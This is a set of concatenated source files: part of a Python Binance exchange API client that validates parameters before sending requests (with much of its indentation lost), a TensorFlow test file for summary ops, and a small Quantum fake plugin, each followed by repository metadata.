# mark all parameters in queryParams in expected['FOUND']
if expected['NAME'].str.contains(key).any():
a = expected.index[expected['NAME'].str.match(key)]
expected.set_value(a,'FOUND',True)
else:
self.logger.error("key not found %s",key)
return 0
# Check the type. Could be improved
paramType = str(type(value)).split("\'")[1] # this extracts the string that is the type
self.logger.debug("paramType calculated is %s", paramType)
self.logger.debug("comparison is to %s", expected.iloc[a]['TYPE'].any())
if(not paramType == expected.iloc[a]['TYPE'].any()):
self.logger.error("type mismatch, return 0, %s %s %s", key, value, paramType)
return 0
else:
self.logger.debug("no type mismatch, %s %s %s", key, value, paramType)
# check if values exceed MAXIMUM, if provided
if ('MAXIMUM' in expected.columns and expected.iloc[a]['MAXIMUM'].any()):
if (queryParams[key] > expected.loc[expected['NAME'] == key,'MAXIMUM'].iloc[0]):
self.logger.info("key %s exceeded MAXIMUM %s, return 0", key, str(int(expected.loc[expected['NAME'] == key,'MAXIMUM'].iloc[0])))
return 0
else:
self.logger.debug("no maximum for %s", key)
# see if expected['VALID'] is set. This indicates enum values, so we check these against the
# values passed in and return an error if the value is not in the enum
#if (expected.iloc[a]['VALID'].any()):
if ('VALID' in expected.columns and expected.iloc[a]['VALID'].any()):
self.logger.debug("expected.iloc[a]['VALID'].any() is %s", expected.iloc[a]['VALID'].any())
if(not value in expected.iloc[a]['VALID'].any()):
self.logger.error("key %s with value %s not found in %s, return 0", key, value, expected.iloc[a]['VALID'].any())
return 0
else:
self.logger.debug("no enum for %s", key)
# see if there are any cases expected['FOUND'] == False and expected['MANDATORY'] == True
# this indicates that a required parameter was not found
if (len(expected[(expected['FOUND'] == False) & (expected['MANDATORY'] == True)]) > 0):
self.logger.error("mandatory columns missing return 0 %s", expected[(expected['FOUND'] == False) & (expected['MANDATORY'] == True)])
return 0
return 1
else: # if no values in expected, make sure queryParams is also empty
if (any(queryParams)):
# expected is empty but queryParams is not
self.logger.error("expected is empty but queryParams contains unexpected values, return 0 ")
return 0
else:
# both expected and queryParams are empty
return 1
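    # Illustrative example: with
    #   expected = pd.DataFrame([{'NAME': 'symbol', 'TYPE': 'str', 'MANDATORY': True,
    #                             'DEFAULT': '', 'FOUND': False}])
    # validateParams({'symbol': 'SALTBTC'}, expected) returns 1, whereas
    # validateParams({'limit': 5}, expected) returns 0 because 'limit' is not an expected key
    # and the mandatory 'symbol' parameter is missing.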
def getOrderBook(self, queryParams):
#
# ---- DESCRIPTION ---
# Gets the order book for a given asset with GET /api/v1/depth
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5}
#
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
# The documentation says limit <= 100 but seems to be at odds with how the system behaves.
# Trying various values resulted in an error message
# {"code":-1100,"msg":"Illegal characters found in parameter 'limit';
# legal range is '50, 20, 100, 500, 5, 200, 10'."}
# No other values seem to work aside from the list above, so we value check the input for limit
# to make sure it is in the legal range
# valid values
enumSymbols = self.getSymbols()
enumLimit = [5,10,20,50,100,200,500]
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':100,'FOUND':False,'MAXIMUM':500,'VALID':enumLimit}, ignore_index=True)
# API specific inputs
path = '/api/v1/depth'
verb = 'get'
return self.requestSender(path, verb, queryParams, expected)
def getAggTrades(self, queryParams):
#
# ---- DESCRIPTION ---
# Gets the compressed, aggregated trades from GET /api/v1/aggTrades
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5,'startTime':1507045646123,'endTime':1507045646456,'fromId':11234}
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# Limit uses 500 for values > 500 (i.e. if limit = 6000 then 500 rows are returned). Really large values
# return an error, so the logic in this function will set limit = 500 if the passed value exceeds 500
#
# The documentation specifies a type of LONG for fromId, startTime, and endTime. Python evaluates a 13
# digit number (such as an epoch time in ms) as an int, so the type we specify in expected is int for these.
# This should keep floats or strings from sneaking by and we add some checks to make sure the values are reasonable.
#
# valid values
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'fromId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'startTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'endTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v1/aggTrades'
verb = 'get'
# API specific checks for startTime, endTime, and limit
# Per the documentation: "If both startTime and endTime are sent, limit should not be sent
# AND the distance between startTime and endTime must be less than 24 hours."
if (('startTime' in queryParams) and ('endTime' in queryParams)):
if ((len(str(queryParams['startTime'])) == 13) and (len(str(queryParams['endTime'])) == 13)):
if ((queryParams['endTime'] - queryParams['startTime']) < 1000*60*60*24):
# remove limit if startTime and endTime are set, valid, and have appropriate range
queryParams.pop('limit',None)
self.logger.info("removed queryParams['limit'] due to presense of startTime and endTime")
else:
self.logger.error("difference betweeen startTime and endTime > 24 hours , return 0 ")
return 0
else:
self.logger.error("startTime and/or endTime contain invalid values , return 0 ")
return 0
else:
if('startTime' in queryParams):
self.logger.error("startTime present, endTime missing , return 0 ")
return 0
elif('endTime' in queryParams):
self.logger.error("endTime present, startTime missing , return 0 ")
return 0
else:
self.logger.info ("both endTime and startTime missing , proceeding ")
return self.requestSender(path, verb, queryParams, expected)
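    # Illustrative example: a one-hour window satisfies the 24-hour constraint, so
    #   getAggTrades({'symbol': 'SALTBTC', 'startTime': 1507045646123, 'endTime': 1507049246123})
    # drops any 'limit' value before sending, whereas a window wider than 24 hours
    # returns 0 without making an HTTP call.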
def getKline(self, queryParams):
#
# ---- DESCRIPTION ---
        # Gets the kline/candlestick bars from GET /api/v1/klines
#
# ---- INPUTS ---
# python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5,'startTime':1507045646123,'endTime':1507045646456,'interval':'5m'}
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# pandas dataframe containing parameter definitions from Binance API documentation
# valid values
enumSymbols = self.getSymbols()
        enumIntervals = ['1m','3m','5m','15m','30m','1h','2h','4h','6h','8h','12h','1d','3d','1w','1M']
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'interval','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumIntervals}, ignore_index=True)
expected = expected.append({'NAME':'startTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'endTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v1/klines'
verb = 'get'
# check time inputs
        # the documentation does not specifically mention a maximum spacing between startTime and
        # endTime as it does for other api calls, so just check the basic length of the timestamps.
if (('startTime' in queryParams) and ('endTime' in queryParams)):
if ((len(str(queryParams['startTime'])) != 13) or (len(str(queryParams['endTime'])) != 13)):
self.logger.error("startTime or endTime contain invalid values, return 0 ")
return 0
else:
if(('startTime' in queryParams) or ('endTime' in queryParams)):
self.logger.error("startTime or endTime missing, return 0 ")
return 0
return self.requestSender(path, verb, queryParams, expected)
def getTicker(self, tickerType, queryParams={}):
#
# ---- DESCRIPTION ---
# Gets ticker outputs
# - the 24 hour ticker for a specified asset with GET /api/v1/ticker/24hr
# - the current symbol and price for all assets with GET /api/v1/ticker/allPrices
# - the current book for all assets with GET /api/v1/ticker/allBookTickers
#
# ---- INPUTS ---
# All 3 API calls require a tickerType in ['24hr','allPrices','allBookTickers']
#
# Additional input for symbol if tickerType is '24hr':
# - /api/v1/ticker/24hr: {'symbol':'SALTBTC'}
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
# This consolidates 3 separate relatively simple API calls into a single method.
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
if (tickerType == '24hr'):
# valid values
enumSymbols = self.getSymbols()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
path = '/api/v1/ticker/24hr'
elif (tickerType == 'allPrices'):
path = '/api/v1/ticker/allPrices'
elif (tickerType == 'allBookTickers'):
path = '/api/v1/ticker/allBookTickers'
else:
# invalid tickerType
self.logger.error("Invalid tickerType %s",tickerType)
return 0
# API specific inputs
verb = 'get'
return self.requestSender(path, verb, queryParams, expected)
def createOrder(self, queryParams, testFlag=False):
#
# ---- DESCRIPTION ---
# Creates an order as POST on /api/v3/order if testFlag not specified
# or /api/v3/order/test if testFlag=True
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
enumSide = ['BUY','SELL']
enumType = ['MARKET','LIMIT']
enumTIF = ['GTC','IOC']
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'side','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSide}, ignore_index=True)
expected = expected.append({'NAME':'type','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumType}, ignore_index=True)
expected = expected.append({'NAME':'quantity','TYPE':'float','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'newClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'stopPrice','TYPE':'float','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'icebergQty','TYPE':'float','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# if it is a type=LIMIT order we have to send price and timeInForce or the Binance API sends back an error
if (queryParams['type'] == 'LIMIT'):
# add price and timeInForce to expected
expected = expected.append({'NAME':'price','TYPE':'float','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timeInForce','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumTIF}, ignore_index=True)
else:
# it is a market order and we should not include price or timeInForce
queryParams.pop('price',None)
queryParams.pop('timeInForce',None)
# API specific values
verb = 'post'
signed = True
        # set path based on whether it is a test or not
if (testFlag):
# it is a test
path = '/api/v3/order/test'
# recvWindow is not specified for /api/v3/order but is for /api/v3/order/test
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
else:
# the real deal
path = '/api/v3/order'
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
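    # Illustrative usage (assumes setAPIKey/setSecretKey have already been called; symbol and
    # price values are hypothetical):
    #   order = {'symbol': 'SALTBTC', 'side': 'BUY', 'type': 'LIMIT', 'timeInForce': 'GTC',
    #            'quantity': 1.0, 'price': 0.00012345}
    #   createOrder(order, testFlag=True) signs the request and POSTs it to /api/v3/order/test,
    #   so no real order is placed.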
def queryOrder(self, queryParams):
#
# ---- DESCRIPTION ---
# Queries an order as GET on /api/v3/order
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'origClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/order'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def cancelOrder(self, queryParams):
#
# ---- DESCRIPTION ---
# Cancels an order as DELETE on /api/v3/order
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'origClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'newClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/order'
verb = 'delete'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getOpenOrders(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves a list of open orders with GET on /api/v3/openOrders
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/openOrders'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAllOrders(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves a list of orders with GET on /api/v3/allOrders
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/allOrders'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAccountInfo(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves account info with GET on /api/v3/account
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/account'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAccountTrades(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves account trade history info with GET on /api/v3/myTrades
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
        # ---- OUTPUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'fromId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/myTrades'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
| {
"content_hash": "d1ff5591fb48f3400aae0503d80ea39e",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 156,
"avg_line_length": 37.95792079207921,
"alnum_prop": 0.6766547114444083,
"repo_name": "js7558/pyBinance",
"id": "bbfa8b0a4c9a589ee11984930cf26d3891a248e9",
"size": "32058",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Binance.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "62407"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import numpy as np
import six
from tensorflow.contrib.summary import summary_ops
from tensorflow.contrib.summary import summary_test_util
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import gfile
from tensorflow.python.training import training_util
get_all = summary_test_util.get_all
get_one = summary_test_util.get_one
_NUMPY_NUMERIC_TYPES = {
types_pb2.DT_HALF: np.float16,
types_pb2.DT_FLOAT: np.float32,
types_pb2.DT_DOUBLE: np.float64,
types_pb2.DT_INT8: np.int8,
types_pb2.DT_INT16: np.int16,
types_pb2.DT_INT32: np.int32,
types_pb2.DT_INT64: np.int64,
types_pb2.DT_UINT8: np.uint8,
types_pb2.DT_UINT16: np.uint16,
types_pb2.DT_UINT32: np.uint32,
types_pb2.DT_UINT64: np.uint64,
types_pb2.DT_COMPLEX64: np.complex64,
types_pb2.DT_COMPLEX128: np.complex128,
types_pb2.DT_BOOL: np.bool_,
}
class TargetTest(test_util.TensorFlowTestCase):
def testShouldRecordSummary(self):
self.assertFalse(summary_ops.should_record_summaries())
with summary_ops.always_record_summaries():
self.assertTrue(summary_ops.should_record_summaries())
def testSummaryOps(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t0').as_default(), summary_ops.always_record_summaries():
summary_ops.generic('tensor', 1, '')
summary_ops.scalar('scalar', 2.0)
summary_ops.histogram('histogram', [1.0])
summary_ops.image('image', [[[[1.0]]]])
summary_ops.audio('audio', [[1.0]], 1.0, 1)
# The working condition of the ops is tested in the C++ test so we just
# test here that we're calling them correctly.
self.assertTrue(gfile.Exists(logdir))
  def testDefunSummaries(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t1').as_default(), summary_ops.always_record_summaries():
@function.defun
def write():
summary_ops.scalar('scalar', 2.0)
write()
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].simple_value, 2.0)
def testSummaryName(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
summary_ops.scalar('scalar', 2.0)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scalar')
def testSummaryNameScope(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
with ops.name_scope('scope'):
summary_ops.scalar('scalar', 2.0)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scope/scalar')
def testSummaryGlobalStep(self):
step = training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
summary_ops.scalar('scalar', 2.0, step=step)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scalar')
def testMaxQueue(self):
logs = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logs, max_queue=2, flush_millis=999999,
name='lol').as_default(), summary_ops.always_record_summaries():
get_total = lambda: len(summary_test_util.events_from_logdir(logs))
# Note: First tf.Event is always file_version.
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=1)
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=2)
self.assertEqual(3, get_total())
def testFlush(self):
logs = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logs, max_queue=999999, flush_millis=999999,
name='lol').as_default(), summary_ops.always_record_summaries():
get_total = lambda: len(summary_test_util.events_from_logdir(logs))
# Note: First tf.Event is always file_version.
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=1)
summary_ops.scalar('scalar', 2.0, step=2)
self.assertEqual(1, get_total())
summary_ops.flush()
self.assertEqual(3, get_total())
class DbTest(summary_test_util.SummaryDbTest):
def testIntegerSummaries(self):
step = training_util.create_global_step()
writer = self.create_db_writer()
def adder(x, y):
state_ops.assign_add(step, 1)
summary_ops.generic('x', x)
summary_ops.generic('y', y)
sum_ = x + y
summary_ops.generic('sum', sum_)
return sum_
with summary_ops.always_record_summaries():
with writer.as_default():
self.assertEqual(5, adder(int64(2), int64(3)).numpy())
six.assertCountEqual(
self, [1, 1, 1],
get_all(self.db, 'SELECT step FROM Tensors WHERE dtype IS NOT NULL'))
six.assertCountEqual(self, ['x', 'y', 'sum'],
get_all(self.db, 'SELECT tag_name FROM Tags'))
x_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "x"')
y_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "y"')
sum_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "sum"')
with summary_ops.always_record_summaries():
with writer.as_default():
self.assertEqual(9, adder(int64(4), int64(5)).numpy())
six.assertCountEqual(
self, [1, 1, 1, 2, 2, 2],
get_all(self.db, 'SELECT step FROM Tensors WHERE dtype IS NOT NULL'))
six.assertCountEqual(self, [x_id, y_id, sum_id],
get_all(self.db, 'SELECT tag_id FROM Tags'))
self.assertEqual(2, get_tensor(self.db, x_id, 1))
self.assertEqual(3, get_tensor(self.db, y_id, 1))
self.assertEqual(5, get_tensor(self.db, sum_id, 1))
self.assertEqual(4, get_tensor(self.db, x_id, 2))
self.assertEqual(5, get_tensor(self.db, y_id, 2))
self.assertEqual(9, get_tensor(self.db, sum_id, 2))
six.assertCountEqual(
self, ['experiment'],
get_all(self.db, 'SELECT experiment_name FROM Experiments'))
six.assertCountEqual(self, ['run'],
get_all(self.db, 'SELECT run_name FROM Runs'))
six.assertCountEqual(self, ['user'],
get_all(self.db, 'SELECT user_name FROM Users'))
def testBadExperimentName(self):
with self.assertRaises(ValueError):
self.create_db_writer(experiment_name='\0')
def testBadRunName(self):
with self.assertRaises(ValueError):
self.create_db_writer(run_name='\0')
def testBadUserName(self):
with self.assertRaises(ValueError):
self.create_db_writer(user_name='-hi')
with self.assertRaises(ValueError):
self.create_db_writer(user_name='hi-')
with self.assertRaises(ValueError):
self.create_db_writer(user_name='@')
def testGraphSummary(self):
training_util.get_or_create_global_step()
name = 'hi'
graph = graph_pb2.GraphDef(node=(node_def_pb2.NodeDef(name=name),))
with summary_ops.always_record_summaries():
with self.create_db_writer().as_default():
summary_ops.graph(graph)
six.assertCountEqual(self, [name],
get_all(self.db, 'SELECT node_name FROM Nodes'))
def get_tensor(db, tag_id, step):
cursor = db.execute(
'SELECT dtype, shape, data FROM Tensors WHERE series = ? AND step = ?',
(tag_id, step))
dtype, shape, data = cursor.fetchone()
assert dtype in _NUMPY_NUMERIC_TYPES
buf = np.frombuffer(data, dtype=_NUMPY_NUMERIC_TYPES[dtype])
if not shape:
return buf[0]
return buf.reshape([int(i) for i in shape.split(',')])
def int64(x):
return array_ops.constant(x, dtypes.int64)
if __name__ == '__main__':
test.main()
| {
"content_hash": "02466a73180ebd3a30fefe8623e9fe45",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 79,
"avg_line_length": 36.39430894308943,
"alnum_prop": 0.6632413716072825,
"repo_name": "Xeralux/tensorflow",
"id": "c756f8b27055f9cf86a311e485d97745a3c7a95b",
"size": "9642",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/summary/summary_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9274"
},
{
"name": "C",
"bytes": "340972"
},
{
"name": "C++",
"bytes": "39479562"
},
{
"name": "CMake",
"bytes": "194702"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33675501"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425916"
}
],
"symlink_target": ""
} |
from quantum.common import exceptions as q_exc
from quantum.common.utils import find_config_file
from quantum.db import api as db
from quantum.db import db_base_plugin_v2
from quantum.db import l3_db
from quantum.db import models_v2
class Fake1(db_base_plugin_v2.QuantumDbPluginV2,
l3_db.L3_NAT_db_mixin):
supported_extension_aliases = ['router']
def fake_func(self):
return 'fake1'
def create_network(self, context, network):
session = context.session
with session.begin(subtransactions=True):
net = super(Fake1, self).create_network(context, network)
self._process_l3_create(context, network['network'], net['id'])
self._extend_network_dict_l3(context, net)
return net
